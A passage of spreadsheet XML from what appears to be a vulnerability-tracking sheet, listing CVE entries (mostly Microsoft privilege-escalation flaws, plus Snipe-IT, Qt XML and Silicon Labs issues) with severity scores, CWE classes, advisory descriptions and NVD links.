      </c>
      <c r="D827" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G827" s="5" t="inlineStr"/>
      <c r="H827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I827" s="5" t="inlineStr"/>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L827" s="5" t="inlineStr"/>
      <c r="M827" s="5" t="inlineStr"/>
      <c r="N827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O827" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P827" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q827" s="5" t="inlineStr"/>
      <c r="R827" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S827" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 streams the SQL entry from an uploaded backup archive directly into the MySQL/MariaDB command-line client (`mysql`) without the --binary-mode flag, so the client interprets lines beginning with backslash commands such as `\!` as local shell commands. An authenticated superadministrator who uploads a crafted ZIP backup (POST /admin/backups/upload) and triggers a restore (POST /admin/backups/restore/{filename}) without the optional `clean` sanitizer parameter — which is not applied by default because DB_SANITIZE_BY_DEFAULT is false — can execute arbitrary OS commands as the web application's operating-system user, exposing application secrets (including database credentials and APP_KEY) and allowing modification of application-writable files and data. Version 8.7.0 adds the --binary-mode flag to the client invocation.</t>
        </is>
      </c>
      <c r="T827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11573</t>
        </is>
      </c>
      <c r="D828" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F828" s="5" t="inlineStr">
        <is>
          <t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t>
        </is>
      </c>
      <c r="G828" s="5" t="inlineStr"/>
      <c r="H828" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I828" s="5" t="inlineStr"/>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr"/>
      <c r="L828" s="5" t="inlineStr"/>
      <c r="M828" s="5" t="inlineStr"/>
      <c r="N828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P828" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q828" s="5" t="inlineStr"/>
      <c r="R828" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S828" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion (CWE-674) in the QDomDocument/QDomNode serialization path of the Qt XML module (QtXml, qtbase). QDomElementPrivate::save() and QDomNodePrivate::save() recurse mutually, consuming one stack frame per level of element nesting with no depth limit, no configurable bound and no error return. A document with deeply nested elements parses successfully but exhausts the call stack and terminates the process when serialized. Reachable via QDomDocument::toByteArray() (Qt 4.0 and later), QDomDocument::toString(), QDomDocument::toCString(), QDomNode::save(), and operator&lt;&lt;(QTextStream&amp;, const QDomNode&amp;). Denial of service only — no code execution and no memory disclosure.</t>
        </is>
      </c>
      <c r="T828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16769</t>
        </is>
      </c>
      <c r="D829" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F829" s="5" t="inlineStr">
        <is>
          <t>product-security@silabs.com</t>
        </is>
      </c>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I829" s="5" t="inlineStr"/>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr"/>
      <c r="L829" s="5" t="inlineStr"/>
      <c r="M829" s="5" t="inlineStr"/>
      <c r="N829" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q829" s="5" t="inlineStr"/>
      <c r="R829" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="S829" s="5" t="inlineStr">
        <is>
          <t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t>
        </is>
      </c>
      <c r="T829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="D830" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F830" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I830" s="5" t="inlineStr"/>
      <c r="J830" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K830" s="5" t="inlineStr"/>
      <c r="L830" s="5" t="inlineStr"/>
      <c r="M830" s="5" t="inlineStr"/>
      <c r="N830" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P830" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q830" s="5" t="inlineStr"/>
      <c r="R830" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="S830" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66305</t>
        </is>
      </c>
      <c r="D831" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F831" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I831" s="5" t="inlineStr"/>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L831" s="5" t="inlineStr"/>
      <c r="M831" s="5" t="inlineStr"/>
      <c r="N831" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O831" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P831" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q831" s="5" t="inlineStr"/>
      <c r="R831" s="5" t="inlineStr">
        <is>
          <t>CWE-603</t>
        </is>
      </c>
      <c r="S831" s="5" t="inlineStr">
        <is>
          <t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68835</t>
        </is>
      </c>
      <c r="D832" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F832" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I832" s="5" t="inlineStr"/>
      <c r="J832" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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32" s="5" t="inlineStr"/>
      <c r="M832" s="5" t="inlineStr"/>
      <c r="N832" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O832" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P832" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q832" s="5" t="inlineStr"/>
      <c r="R832" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S832" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="D833" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F833" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I833" s="5" t="inlineStr"/>
      <c r="J833" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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33" s="5" t="inlineStr"/>
      <c r="M833" s="5" t="inlineStr"/>
      <c r="N833" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O833" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P833" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q833" s="5" t="inlineStr"/>
      <c r="R833" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S833" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68889</t>
        </is>
      </c>
      <c r="D834" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F834" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I834" s="5" t="inlineStr"/>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr"/>
      <c r="L834" s="5" t="inlineStr"/>
      <c r="M834" s="5" t="inlineStr"/>
      <c r="N834" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P834" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q834" s="5" t="inlineStr"/>
      <c r="R834" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S834" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68893</t>
        </is>
      </c>
      <c r="D835" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F835" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I835" s="5" t="inlineStr"/>
      <c r="J835" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K835" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L835" s="5" t="inlineStr"/>
      <c r="M835" s="5" t="inlineStr"/>
      <c r="N835" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O835" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P835" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q835" s="5" t="inlineStr"/>
      <c r="R835" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S835" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69272</t>
        </is>
      </c>
      <c r="D836" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F836" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I836" s="5" t="inlineStr"/>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr"/>
      <c r="L836" s="5" t="inlineStr"/>
      <c r="M836" s="5" t="inlineStr"/>
      <c r="N836" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O836" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P836" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q836" s="5" t="inlineStr"/>
      <c r="R836" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S836" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69274</t>
        </is>
      </c>
      <c r="D837" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F837" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I837" s="5" t="inlineStr"/>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr"/>
      <c r="L837" s="5" t="inlineStr"/>
      <c r="M837" s="5" t="inlineStr"/>
      <c r="N837" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O837" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P837" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q837" s="5" t="inlineStr"/>
      <c r="R837" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S837" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69296</t>
        </is>
      </c>
      <c r="D838" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F838" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I838" s="5" t="inlineStr"/>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr"/>
      <c r="L838" s="5" t="inlineStr"/>
      <c r="M838" s="5" t="inlineStr"/>
      <c r="N838" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O838" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P838" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q838" s="5" t="inlineStr"/>
      <c r="R838" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S838" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69305</t>
        </is>
      </c>
      <c r="D839" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F839" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I839" s="5" t="inlineStr"/>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr"/>
      <c r="L839" s="5" t="inlineStr"/>
      <c r="M839" s="5" t="inlineStr"/>
      <c r="N839" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O839" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P839" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q839" s="5" t="inlineStr"/>
      <c r="R839" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S839" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69313</t>
        </is>
      </c>
      <c r="D840" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F840" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I840" s="5" t="inlineStr"/>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr"/>
      <c r="L840" s="5" t="inlineStr"/>
      <c r="M840" s="5" t="inlineStr"/>
      <c r="N840" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O840" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P840" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q840" s="5" t="inlineStr"/>
      <c r="R840" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S840" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69314</t>
        </is>
      </c>
      <c r="D841" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F841" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I841" s="5" t="inlineStr"/>
      <c r="J841" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K84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41" s="5" t="inlineStr"/>
      <c r="M841" s="5" t="inlineStr"/>
      <c r="N841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O841" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P841" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q841" s="5" t="inlineStr"/>
      <c r="R841" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S841" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69336</t>
        </is>
      </c>
      <c r="D842" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F842" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I842" s="5" t="inlineStr"/>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr"/>
      <c r="L842" s="5" t="inlineStr"/>
      <c r="M842" s="5" t="inlineStr"/>
      <c r="N842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O842" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P842" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q842" s="5" t="inlineStr"/>
      <c r="R842" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S842" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69337</t>
        </is>
      </c>
      <c r="D843" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F843" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I843" s="5" t="inlineStr"/>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr"/>
      <c r="L843" s="5" t="inlineStr"/>
      <c r="M843" s="5" t="inlineStr"/>
      <c r="N843" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O843" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P843" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q843" s="5" t="inlineStr"/>
      <c r="R843" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S843" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
